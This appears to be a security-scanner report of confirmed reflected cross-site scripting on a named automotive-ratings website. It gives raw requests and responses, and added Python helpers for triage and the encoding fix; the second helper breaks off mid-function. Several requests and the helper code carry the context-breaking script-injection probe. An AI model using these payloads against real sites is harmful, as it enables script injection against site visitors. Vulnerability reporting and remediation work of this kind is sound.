Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Automotive Ratings Comparison</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"> <div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p> </td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;<span class="style4">Automotive Ratings Comparison</span></div> <div class="pagetext"> <div class="pagetitle_small">Comparison Charts</div> <table width="97%" border="0" cellpadding="5" cellspacing="0" class="text" style="border-bottom: solid #CCCCCC 3px;"> <tr> <td width="75" style="border-bottom: solid tan 3px;">&nbsp;</td> </tr> <tr bgcolor="#F0F0E2"> <td class="boldtext" style="border-right: solid tan 1px;">Segment</td> </tr> <tr height="60"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_tqa.php" class="boldtext">Total Quality Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Satisfaction with complete ownership experience</li> <li>Perception of quality</li> <li>Emotional attachment to vehicle</li> </ul> </td> </tr> <tr height="60" bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_tvi.php" class="boldtext">Total Value Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Delight with the deal</li> <li>Belief in getting a smart buy</li> <li>Likelihood to repurchase, based on value</li> </ul> </td> </tr> <tr height="60"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_pim.php" class="boldtext">Problem Impact Measure</a> <br /><span 
class="noteQuote">(lower number is better)</span> <ul class="smallListText"> <li>Reports of problems</li> <li>Nature of the problems reported</li> <li>Nature of unresolved problems</li> </ul> </td> </tr> <tr height="60" bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"> <a href="auto_delight.php" class="boldtext">Customer Delight Index</a> <br /><span class="noteQuote">(higher number is better)</span> <ul class="smallListText"> <li>Customer loyalty and commitment to product</li> <li>Creates a significant emotional response in<br />personally meaningful ways</li> </ul> </td> </tr> </table> <br /> <!-- Show the relative comparison of each vehicle --> <table width="97%" border="0" cellpadding="5" cellspacing="0" class="text" style="border-bottom: solid #CCCCCC 3px; border-right: solid #CCCCCC 1px;"> <tr bgcolor="#F0F0E2"> <td colspan="3" class="boldtext" style="border-top: solid tan 3px;">Side-by-side Comparison</td> </tr> <tr> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_tqe.php" class="boldtext">Total Quality Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_tvi.php" class="boldtext">Total Value Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_pim.php" class="boldtext">Problem Impact Measure</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> <tr bgcolor="#EFEFEF"> <td style="border-right: solid #CCCCCC 1px;"><a href="auto_delight.php" class="boldtext">Customer Delight Index</a></td> <td class="smallListText_space" align="right"> </td> <td> </td> </tr> </table> <p class="boldtext" align="right"..
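The three findings above and below (yr4 and numCars on /ratings.php, referrer on /view_ratings.php) all use the same probe: a value that closes the quoted attribute it is echoed into, closes any open style or script element, and opens a fresh script block. Two details in the report matter when re-checking them. First, the request for the yr4 finding injects yr4, yet the recorded response echoes the marker in the yr2 hidden input, so a re-test should report which field actually carries the reflection rather than assume the injected name. Second, the /view_ratings.php response excerpt is cut off before the marker appears, so that entry needs a full capture to see the context. The following triage helper is an added example, not part of the Netsparker output or of the strategicvision.com application; the field baseline is copied from the report's request table, the response excerpt is constructed to mirror the yr2 line in the recorded /ratings.php response, and the function names are my own.

```python
"""Triage helper for the reflected-XSS entries in this report.

Added example, not part of the Netsparker output or of the strategicvision.com
application. Given a captured response it answers the question the scanner's
"CONFIRMED" flag stands for: did the probe reach a script context, and through
which field? It also shows the output encoding that keeps the same value inert.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Probe shape used throughout the report: close the quoted attribute, then close
# any open <style>/<script> so the following <script> is parsed as a new element.
PROBE = "'\"--></style></script><script>netsparker({marker})</script>"

# Baseline form fields for /ratings.php, taken from the report's request table.
BASELINE = {"Year": "3", "numCars": "3"}
for _i in range(1, 6):
    for _p in ("yr", "mk", "mo"):
        BASELINE[f"{_p}{_i}"] = "3"

# The body Netsparker actually sent for the yr4 finding (copied from the report).
REPORT_BODY = (
    "Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3"
    "&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000909)"
    "%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3"
)


def build_body(param, marker="0x000909", baseline=BASELINE):
    """Form-encode the baseline with one field replaced by the probe.

    Pass a different baseline (e.g. the referrer/v_yr1.. fields) to rebuild
    the /view_ratings.php request the same way.
    """
    if param not in baseline:
        raise KeyError(f"unknown field {param!r}")
    fields = dict(baseline, **{param: PROBE.format(marker=marker)})
    return urlencode(fields)


def decoded_fields(body):
    """Decode a form body to {field: [values]} so two encodings can be compared."""
    return parse_qs(body, keep_blank_values=True)


class _ReflectionFinder(HTMLParser):
    """Locate the marker and classify the context it landed in."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.needle = f"netsparker({marker})"
        self.in_script = False
        self.last_input = None  # name of the most recent <input>, broken or not
        self.hit = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input":
            self.last_input = attrs.get("name")
        if tag == "script":
            self.in_script = True
        # Marker inside an attribute value means the page encoded it: the
        # parser unescaped the entities, but no new element was created.
        if self.hit is None and any(v and self.needle in v for v in attrs.values()):
            self.hit = {"context": "attribute", "field": attrs.get("name")}

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and self.needle in data:
            # A script element whose body is our marker: the probe broke out
            # of the attribute, so the value was written unencoded.
            self.hit = {"context": "script", "field": self.last_input}


def find_reflection(body, marker):
    """Return {"context": "script"|"attribute", "field": name} or None."""
    finder = _ReflectionFinder(marker)
    finder.feed(body)
    finder.close()
    return finder.hit


def render_hidden_input(name, value):
    """The fix: encode the value for an attribute context before echoing it
    (PHP equivalent: htmlspecialchars($value, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="hidden" name="{name}" id="{name}" value="{html.escape(value, quote=True)}" />'


# Constructed excerpt modelled on the /ratings.php response in the report:
# yr4 was injected, yet the marker is echoed in the yr2 input.
SAMPLE_RESPONSE = (
    '<form name="ratingsSelection" action="ratings.php" method="post">\n'
    '<input type="hidden" name="yr1" id="yr1" value="3" />\n'
    '<input type="hidden" name="yr2" id="yr2" value="\'"--></style></script>'
    '<script>netsparker(0x000909)</script>" />\n'
    '<input type="hidden" name="mk2" id="mk2" value="3" />\n'
    "</form>"
)

if __name__ == "__main__":
    print(find_reflection(SAMPLE_RESPONSE, "0x000909"))
    fixed = render_hidden_input("yr4", PROBE.format(marker="0x000909"))
    print(find_reflection(fixed, "0x000909"))
```

Run against the constructed excerpt, find_reflection reports a script context carried by yr2, which is the shape of the recorded response; run against the output of render_hidden_input it reports an attribute context, i.e. the same bytes present but inert. Comparing decoded_fields(build_body("yr4")) with decoded_fields(REPORT_BODY) confirms the rebuilt request is field-for-field the one in the report even though urlencode percent-encodes a few more characters than Netsparker did.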
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST '"--></style></script><script>alert(0x0009D1)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0009D1)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> 
<div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a 
href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS 
Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x0009D1)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
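The confirmed /ratings.php findings in this section (numCars above, yr2 and mk2 following) share one defect: a POST field is written straight back into the `value` attribute of a hidden `<input>` with no HTML encoding, so the probe's leading `'"` closes the double-quoted attribute and the remainder lands in the page as live markup (compare the echoed `<input type="hidden" name="numCars" ... value="'"--></style></script><script>netsparker(0x0009D1)</script>" />` with the submitted body). Note also that in the second finding the value sent as `yr2` is echoed in the `yr1` field, so the reflection point has to be searched for in the whole response rather than in the same-named field. The Python below is an added example, not part of the Netsparker report or of the site's code. It rebuilds the request body for any of the sixteen form fields using the escaping visible in the report's bodies (so the result can be checked against the `Content-Length: 183` header shown), classifies a response by whether the marker ends up as the text of a `<script>` element or stays inert inside an attribute value, and shows the attribute-context encoding (the Python equivalent of PHP's `htmlspecialchars($v, ENT_QUOTES, 'UTF-8')`) that would have closed all of these findings. The response documents are constructed stand-ins for the report's HTML, not fetched from the site, and the parser-based check is a substitute for whatever the scanner does to mark a finding CONFIRMED.

```python
"""
Added example, not part of the Netsparker report or of the strategicvision.com
code: rebuild the /ratings.php probe request, classify a response by where the
marker landed, and show the attribute-context encoding that prevents the bug.
Standard library only; the responses used below are constructed, not captured.
"""
import html
from html.parser import HTMLParser

# The sixteen POST fields of the ratingsSelection form, in the order the report sends them.
FORM_FIELDS = ["numCars"] + ["%s%d" % (p, i) for i in range(1, 6) for p in ("yr", "mk", "mo")]

# Characters the report's bodies leave unencoded (inferred from the request lines shown).
SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'()-_.")


def probe(marker):
    """The context-breaking probe as it appears in the report, around a given marker."""
    return "'\"--></style></script><script>%s</script>" % marker


def form_encode(pairs):
    """application/x-www-form-urlencoded with the escaping seen in the report:
    lowercase hex, and ' ( ) - _ . left as-is (urllib.parse.urlencode would differ)."""
    def q(s):
        return "".join(chr(b) if chr(b) in SAFE else "%%%02x" % b for b in s.encode("utf-8"))
    return "&".join("%s=%s" % (q(k), q(v)) for k, v in pairs)


def build_probe_body(injected_field, marker, filler="3"):
    """Request body for one finding: the probe in injected_field, filler everywhere else."""
    return form_encode([(f, probe(marker) if f == injected_field else filler) for f in FORM_FIELDS])


class MarkerContext(HTMLParser):
    """Records whether `marker` shows up as the text of a <script> element (it would run)
    or only inside an attribute value (it is inert there)."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=True)
        self.marker = marker
        self.in_script = False
        self.as_script = False
        self.in_attribute = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        # attribute values arrive entity-decoded, so an encoded echo is still found here
        if any(v and self.marker in v for _, v in attrs):
            self.in_attribute = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and self.marker in data:
            self.as_script = True


def classify(response_html, marker):
    """'script' if the marker would execute, 'attribute' if it stayed inside a value,
    'absent' if it was not reflected at all."""
    p = MarkerContext(marker)
    p.feed(response_html)
    p.close()
    if p.as_script:
        return "script"
    if p.in_attribute:
        return "attribute"
    return "absent"


def encode_for_attribute(value):
    """Python equivalent of PHP htmlspecialchars($value, ENT_QUOTES, 'UTF-8'):
    & < > " and ' are all escaped, so a value can never close a quoted attribute."""
    return html.escape(value, quote=True)


def render_hidden_input(name, value, fixed):
    """The echoing line from the report's response, either as-is or with attribute encoding."""
    shown = encode_for_attribute(value) if fixed else value
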